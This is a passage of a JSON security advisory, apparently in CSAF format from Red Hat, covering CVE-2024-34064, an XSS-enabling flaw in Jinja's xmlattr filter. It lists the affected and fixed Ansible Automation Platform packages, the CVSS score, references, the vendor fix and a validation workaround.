"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el9ap.noarch"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2279476"
}
],
"notes": [
{
"category": "description",
"text": "Jinja is an extensible templating engine. The `xmlattr` filter in affected versions of Jinja accepts keys containing non-attribute characters. XML/HTML attributes cannot contain spaces, `/`, `\u003e`, or `=`, as each would then be interpreted as starting a separate attribute. If an application accepts keys (as opposed to only values) as user input, and renders these in pages that other users see as well, an attacker could use this to inject other attributes and perform XSS. The fix for CVE-2024-22195 only addressed spaces but not other characters. Accepting keys as user input is now explicitly considered an unintended use case of the `xmlattr` filter, and code that does so without otherwise validating the input should be flagged as insecure, regardless of Jinja version. Accepting _values_ as user input continues to be safe. This vulnerability is fixed in 3.1.4.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "jinja2: accepts keys containing non-attribute characters",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The fix for CVE-2024-22195 only addressed spaces, not other characters. Accepting keys as user input is now explicitly considered an unintended use case of the `xmlattr` filter, and code that does so without otherwise validating the input should be flagged as insecure, regardless of Jinja version. Accepting _values_ as user input continues to be safe.\n\nFence agents on RHEL 8 has been fixed as a part of https://access.redhat.com/errata/RHBA-2024:4238",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64"
],
"known_not_affected": [
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el9ap.noarch"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-34064"
},
{
"category": "external",
"summary": "RHBZ#2279476",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2279476"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-34064",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-34064"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-34064",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-34064"
},
{
"category": "external",
"summary": "https://github.com/pallets/jinja/security/advisories/GHSA-h75v-3vvj-5mfj",
"url": "https://github.com/pallets/jinja/security/advisories/GHSA-h75v-3vvj-5mfj"
}
],
"release_date": "2024-05-06T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-07-12T01:43:40+00:00",
"details": "Red Hat Ansible Automation Platform",
"product_ids": [
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:4522"
},
{
"category": "workaround",
"details": "Do not accept user input as keys to the xmlattr filter without validation. See the statement above for more information.",
"product_ids": [
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
